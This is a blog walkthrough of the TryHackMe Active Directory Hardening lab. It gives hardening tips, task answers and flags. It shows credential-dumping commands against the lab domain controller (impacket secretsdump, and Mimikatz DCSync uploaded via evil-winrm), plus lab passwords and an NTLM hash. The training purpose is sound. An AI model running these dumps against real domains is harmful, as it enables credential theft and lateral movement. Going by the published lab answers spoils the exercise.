TL;DR TryHackMe is running a promotion for the new Security Engineer pathway! Refer a friend, complete rooms, write one of these walkthroughs, etc for a chance to win stuff! Also, here’s a walkthrough of the AD Hardening room.
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
Run, don’t walk, to the new TryHackMe Security Engineer pathway. Complete rooms, refer a friend, do a writeup, let your company know about TryHackMe training, and you, yes you could win some great stuff like a free year of TryHackMe or a laptop.
Here at test.local we had the day off so we immediately knocked out the Active Directory Hardening room in the pathway.
The room is very basic and introductory, but it’s a great start. It seeks to educate regarding basic security hygiene such as
- Requiring SMB & LDAP signing
- Requiring password length
- Least privilege
- Privilege tiers
- Compliance with baselines
- Protecting against common attacks such as Kerberoasting
The room left out a few things that should be done in most Windows domain environments:
- Disabling LLMNR & NetBIOS
- Configuring LAPS on any workstation OUs
- Using the Protected Users group
- Disabling delegation on privileged user accounts
- Considering smartcards [they can be expensive, but they’re cheaper than a breach]
The room did however list other TryHackMe rooms that cover much of the above.
Well that’s enough theory, let’s put our hands on the keyboard, connect to the VM, and start finding some answers.
xfreerdp /v:10.10.66.5 /u:Administrator /p:tryhackmewouldnotguess1@ /dynamic-resolution
— Task 2 —
What is the root domain in the attached AD machine?
Get-ADDomain
Or if you want just the answer
(Get-ADDomain).DNSRoot
tryhackme.loc
— Task 3 —
What is the default minimum password length (number of characters) in the attached VM?
Get-ADDefaultDomainPasswordPolicy
Or if you want just the answer
(Get-ADDefaultDomainPasswordPolicy).MinPasswordLength
7
— Task 5 —
Find and open BaselineLocalInstall script in PowerShell editor — Can you find the flag?
Get-Content (Get-ChildItem -Path “C:\Users\Administrator\Desktop\Scripts” -Include “*BaselineLocalInstall*” -File -Recurse -ErrorAction SilentlyContinue).PSPath | Select-String “THM{“
THM{00001}
Find and open MergePolicyRule script (Policy Analyser) in PowerShell editor — Can you find the flag?
I couldn’t find the “MergePolicyRule.ps1”. I think it was supposed to be “Merge-PolicyRule.ps1”.
Get-Content (Get-ChildItem -Path “C:\Users\Administrator\Desktop\Scripts” -Include “*.ps1” -File -Recurse -ErrorAction SilentlyContinue).PSPath | Select-String “{*}”
{THM00191}
Alt:
Get-Content (Get-ChildItem -Path “C:\Users\Administrator\Desktop\Scripts” -Include “*.ps1” -File -Recurse -ErrorAction SilentlyContinue).PSPath | Select-String “Flag :”
— Task 6 —
As per the generated report, how many users have the same password as aaron.booth?
Initially I just ran secretsdump from Kali since after all we already have a Domain Admin login.
cd /home/kali/Downloads/impacket-master/examples
python3 secretsdump.py -just-dc-ntlm za/Administrator@10.10.66.5
However this is not a good way to get a count of matching NTLM hashes. Therefore I copied Invoke-Mimikatz.ps1 to the VM and ran it there. This can be done via evil-winrm. (Our Mimikatz cheatsheet is here if you are not familiar with it.)
evil-winrm -i 10.10.66.3 -u Administrator -p tryhackmewouldnotguess1@
upload /home/kali/Downloads/exploits/PowerShell/Invoke-Mimikatz.ps1
Or one can just copy/paste it over RDP.
Dump all the hashes to a file.
Invoke-Mimikatz -Command ‘“lsadump::dcsync /domain:za.tryhackme.loc /all”’ | Out-File .\AllCreds.txt
Find aaron.booth’s NTLM.
Get-Content .\AllCreds.txt | Select-String aaron.booth -Context 5
copy/paste aaron.booth’s hash and get a count of total matches.
(Get-Content .\AllCreds.txt | Select-String “64f12cddaa88057e06a81b54e73b949b”).Count
Just stubtract 1 since aaron.booth is one of the matches.
186
By the way, there were 5,046 AD users on the VM, so running quick queries like the above is a good, workable way to get a count quickly and easily.
In case anyone else is curious, aaron.booth’s plaintest password is Password1.
Summary
I’m always happy to see TryHackMe roll out a new pathway. This one looks promising and a good way to keep getting hand on practice and learn.
References
NTLM: https://learn.microsoft.com/en-us/windows/win32/secauthn/microsoft-ntlm
Dumping all domain hashes with Mimikatz: https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/